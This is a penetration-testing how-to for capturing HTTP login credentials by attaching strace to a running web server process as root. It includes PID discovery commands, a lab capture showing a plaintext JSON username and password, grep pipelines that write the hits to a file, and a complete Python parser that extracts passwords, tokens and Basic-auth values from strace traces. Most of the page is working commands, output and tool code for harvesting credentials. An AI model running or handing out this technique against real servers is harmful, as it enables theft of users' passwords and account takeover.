# Dump HTTP Credentials

This technique is for the case where you have `strace` on the box, an HTTP server process, and you want to intercept what that process reads from its sockets in order to capture the credentials a user submits to a login form. It requires permission to ptrace the target: being root (or holding `CAP_SYS_PTRACE`), or being the owner of the process when the kernel allows it. On distributions that ship Yama with `kernel.yama.ptrace_scope=1` (Ubuntu's default), even the owner can only attach to a process's own descendants, so in practice you need root. It works for plaintext HTTP. For HTTPS it only works when TLS is terminated somewhere else (for example a reverse proxy such as nginx forwarding plain HTTP to the backend on localhost), so that the traced process receives plaintext; if the process handles TLS itself, the socket syscalls only show ciphertext.

## Identifying the service's PID

```
netstat -putona
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 127.0.0.1:43493         0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:4040          0.0.0.0:*               LISTEN      86230/ngrok          off (0.00/0/0)
tcp        0      0 127.0.0.1:36023         0.0.0.0:*               LISTEN      2904/Code --standar  off (0.00/0/0)
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp6       0      0 :::3389                 :::*                    LISTEN      -                    off (0.00/0/0)
tcp6       0      0 127.0.0.1:34103         :::*                    LISTEN      5156/java            off (0.00/0/0)
tcp6       0      0 127.0.0.1:8080          :::*                    LISTEN      5156/java            off (0.00/0/0)
tcp6       0      0 ::1:3350                :::*                    LISTEN      -                    off (0.00/0/0)
tcp6       0      0 2001:1388:13a7:cf:48056 2600:1f1e:4e5:1::6e:443 ESTABLISHED 86230/ngrok          keepalive (6.67/0/0)
udp        0      0 192.168.1.41:68         192.168.1.1:67          ESTABLISHED -                    off (0.00/0/0)
udp        0      0 224.0.0.251:5353        0.0.0.0:*                           5358/chrome --disab  off (0.00/0/0)
udp6       0      0 fe80::b625:3910:980:546 :::*                                -                    off (0.00/0/0)

```

Note that `netstat -p` only shows the PID/program for processes you own unless you are root, which is why the listener on port 80 appears as `-` above (`ss -tulpn` gives the same view on systems without netstat). We can also identify it with `ps aux`:

```
root       88312  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/6:2-mm_percpu_wq]
root       88313  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/5:2-rcu_gp]
dsds       88389  0.0  0.1 1186390240 64836 ?    Sl   Apr10   0:00 /home/dsds/BurpSuitePro/burpbrowser/122.0.6261.111/chrome --type=renderer --crashpad-handler-pid=5361 --enable-crash-reporter=, --user-
root       88502  0.8  0.1 260876 37652 pts/0    Sl+  Apr10   0:55 /home/dsds/ponencias/dragon-jar/api/env/bin/python3 app.py
root       88857  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/11:3-cgroup_destroy]
root       89074  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/8:1-events]
root       89553  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/12:1-cgroup_destroy]
root       89555  0.0  0.0      0     0 ?        I    Apr10   0:00 [kworker/14:0-mm_percpu_wq]

```

The PID we want is 88502: the Werkzeug/Flask app (`python3 app.py`) running as root, which is the process listening on port 80.

## Tracing the process to capture the requests

```
strace -e trace=network -s 1024 -fp 88502 2>&1
```

`-p` attaches to the running process, `-f` follows its threads and any children it forks (web servers usually handle each connection in a worker thread or process), `-e trace=network` limits the output to socket syscalls (`accept4`, `recvfrom`, `sendto`, ...), `-s 1024` raises the maximum string length printed from the default of 32 bytes so the request is not cut off, and `2>&1` sends strace's output (which goes to stderr) to stdout so it can be piped. One caveat: servers that use plain `read`/`write` on the accepted socket instead of `recvfrom`/`sendto` produce no lines under the `network` class; for those, trace them explicitly with `-e trace=network,read,write`.

## Identifying the endpoint

```
# strace -e trace=network -s 1024 -fp 88502 2>&1
strace: Process 88502 attached with 2 threads
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5
[pid 88503] getsockname(5, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.168.1.41")}, [128 => 16]) = 0
strace: Process 165519 attached
[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nOrigin: http://lab-cors.local\r\nReferer: http://lab-cors.local/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 439
[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\nServer: Werkzeug/3.0.2 Python/3.11.2\r\nDate: Thu, 11 Apr 2024 05:40:10 GMT\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n", 175, 0, NULL, 0) = 175
[pid 165519] sendto(5, "{\n  \"error\": \"Credenciales incorrectas\"\n}\n", 42, 0, NULL, 0) = 42
[pid 165519] shutdown(5, SHUT_WR)       = 0
[pid 165519] +++ exited with 0 +++
```

The credentials are right there in the JSON body, `{"usuario":"sdfsdf","contrasena":"sdfsdf"}`, and the request line of the same `recvfrom` gives us the endpoint, `/api/login`.

The endpoint can also be identified from a proxy such as Burp Suite.

The `-s` parameter controls how much of each string strace prints; the default of 32 bytes would cut the request off before the body. Raise it if a request is longer than 1024 bytes: a closing quote followed by `...` in the output means the string was truncated at the limit.

## Refining the command

We can filter the output down to the exact endpoint:

```
strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login
```

<figure><img src="/files/FJ5eYMOqC3nbBALCYx3M" alt=""><figcaption></figcaption></figure>

This keeps only lines that contain the path. If the server reads the headers and the body in separate syscalls, the body arrives in a second `recvfrom`/`read` line that does not contain `/api/login` and is dropped by the filter, so in that case grep for a field name from the body instead. Alternatively, we can write the output to a file:

```
(strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login) > credentials.txt
```
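Grepping for the path is enough when a single `recvfrom` carries the whole request, but strace prints the data as a C-escaped string (`\r\n`, `\"`, octal `\NNN`, hex `\xNN` with `-x`), truncates it at the `-s` limit, and servers do not always hand you JSON. The following parser is an added example (not code from the original page or the traced application) that decodes receive-side lines (`recvfrom`, `recv`, `read`) from a saved trace, reassembles the HTTP request, flags bodies that are shorter than their `Content-Length` or cut by `-s`, and pulls credential-looking fields from JSON bodies, form-urlencoded bodies and `Authorization: Basic` headers. The trace lines in `SAMPLE_TRACE` are constructed, modelled on the page's capture; the field-name list in `_CRED_KEYS` is an assumption and should be extended for the target application.

```python
"""Extract HTTP credentials from strace network output (added example, not from the page)."""
import base64
import binascii
import json
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional
from urllib.parse import parse_qs

# One receive-side syscall per line, optionally prefixed by "[pid N]" when strace runs
# with -f. The data argument is a C-escaped string; a "..." after the closing quote means
# strace hit the -s limit and cut the string short.
_LINE_RE = re.compile(
    r'^(?:\[pid\s+(?P<pid>\d+)\]\s+)?'
    r'(?P<call>recvfrom|recv|read)\((?P<fd>\d+),\s*'
    r'"(?P<data>(?:[^"\\]|\\.)*)"(?P<trunc>\.\.\.)?'
)
# strace escapes: \xNN (with -x), octal \NNN (default for non-printables), and single chars.
_ESC_RE = re.compile(r'\\(x[0-9a-fA-F]{2}|[0-7]{1,3}|.)')
_SIMPLE_ESCAPES = {"n": b"\n", "r": b"\r", "t": b"\t", "v": b"\v",
                   "f": b"\f", "a": b"\a", "b": b"\b", '"': b'"', "\\": b"\\"}
_METHODS = (b"GET ", b"POST ", b"PUT ", b"PATCH ", b"DELETE ")
# Field names worth reporting (assumed list; substring match, case-insensitive).
_CRED_KEYS = re.compile(r"user|usuario|login|email|pass|contrasen|pwd|secret|token", re.I)


def unescape(s: str) -> bytes:
    """Turn the C-escaped string strace printed back into the raw bytes the process read."""
    out = bytearray()
    pos = 0
    for m in _ESC_RE.finditer(s):
        out += s[pos:m.start()].encode("latin-1", "replace")
        tok = m.group(1)
        if tok[0] == "x":
            out.append(int(tok[1:], 16))
        elif tok[0] in "01234567":
            out.append(int(tok, 8) & 0xFF)
        else:
            out += _SIMPLE_ESCAPES.get(tok, tok.encode("latin-1", "replace"))
        pos = m.end()
    out += s[pos:].encode("latin-1", "replace")
    return bytes(out)


@dataclass
class HttpRequest:
    pid: Optional[str]
    fd: int
    method: str
    path: str
    headers: Dict[str, str]
    body: bytes
    truncated: bool  # strace cut the string at the -s limit

    @property
    def incomplete(self) -> bool:
        """True when the body we saw is shorter than the request promised (raise -s)."""
        if self.truncated:
            return True
        try:
            return int(self.headers.get("content-length", "0")) > len(self.body)
        except ValueError:
            return False


def parse_line(line: str) -> Optional[HttpRequest]:
    """Return an HttpRequest if the strace line is a receive that starts an HTTP request."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    data = unescape(m.group("data"))
    if not data.startswith(_METHODS):
        return None  # body-only continuation or non-HTTP data; ignored here
    head, _, body = data.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    parts = lines[0].decode("latin-1").split(" ")
    if len(parts) < 3:
        return None
    headers: Dict[str, str] = {}
    for raw in lines[1:]:
        k, _, v = raw.decode("latin-1").partition(":")
        headers[k.strip().lower()] = v.strip()
    return HttpRequest(m.group("pid"), int(m.group("fd")), parts[0], parts[1],
                       headers, body, m.group("trunc") is not None)


def extract_credentials(req: HttpRequest) -> Dict[str, str]:
    """Credential-looking fields from a Basic Authorization header, a JSON or a form body."""
    found: Dict[str, str] = {}
    auth = req.headers.get("authorization", "")
    if auth[:6].lower() == "basic ":
        try:
            found["authorization"] = base64.b64decode(auth[6:], validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            pass
    ctype = req.headers.get("content-type", "").lower()
    fields: Dict[str, object] = {}
    if "json" in ctype:
        try:
            obj = json.loads(req.body)
            if isinstance(obj, dict):
                fields = obj
        except ValueError:
            pass  # truncated JSON does not parse; req.incomplete tells the caller why
    elif "x-www-form-urlencoded" in ctype:
        fields = {k: v[0] for k, v in parse_qs(req.body.decode("latin-1")).items()}
    for k, v in fields.items():
        if _CRED_KEYS.search(k):
            found[k] = str(v)
    return found


def dump_credentials(lines: Iterable[str]) -> List[dict]:
    """One record per HTTP request seen in the trace, with whatever credentials it carried."""
    results = []
    for line in lines:
        req = parse_line(line)
        if req is None:
            continue
        results.append({"pid": req.pid, "method": req.method, "path": req.path,
                        "credentials": extract_credentials(req), "incomplete": req.incomplete})
    return results


# Constructed sample trace modelled on the page's capture: a JSON login, a form login read
# with plain read(), a Basic-auth request, and a JSON login truncated by the -s limit.
SAMPLE_TRACE = [
    r'[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5',
    r'[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nContent-Type: application/json\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 439',
    r'[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\n\r\n", 29, 0, NULL, 0) = 29',
    r'read(7, "POST /login HTTP/1.1\r\nHost: app.local\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 30\r\n\r\nusername=alice&password=s3cr3t", 4096) = 133',
    r'[pid 4242] recvfrom(6, "GET /api/me HTTP/1.1\r\nHost: app.local\r\nAuthorization: Basic Ym9iOmh1bnRlcjI=\r\n\r\n", 8192, 0, NULL, NULL) = 77',
    r'[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Type: application/json\r\nContent-Length: 60\r\n\r\n{\"usuario\":\"carol\",\"contrasena"..., 8192, 0, NULL, NULL) = 180',
]

if __name__ == "__main__":
    for hit in dump_credentials(SAMPLE_TRACE):
        print(hit)
```

Feed it a trace saved with `strace -o`, or pipe the live `strace ... 2>&1` output into it, and act on the `incomplete` flag: it means the body was cut off and the capture should be repeated with a larger `-s`. A request whose body arrives in a separate syscall is reported without its fields, since this parser does not reassemble across lines.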

When grep's output is a file rather than a terminal it block-buffers, so the file can stay empty until grep exits; pass `--line-buffered` to grep, or use strace's own `-o` option to write the raw trace and filter it afterwards, to see hits as they arrive. The file holds plaintext credentials, so protect it and remove it once the engagement is over.
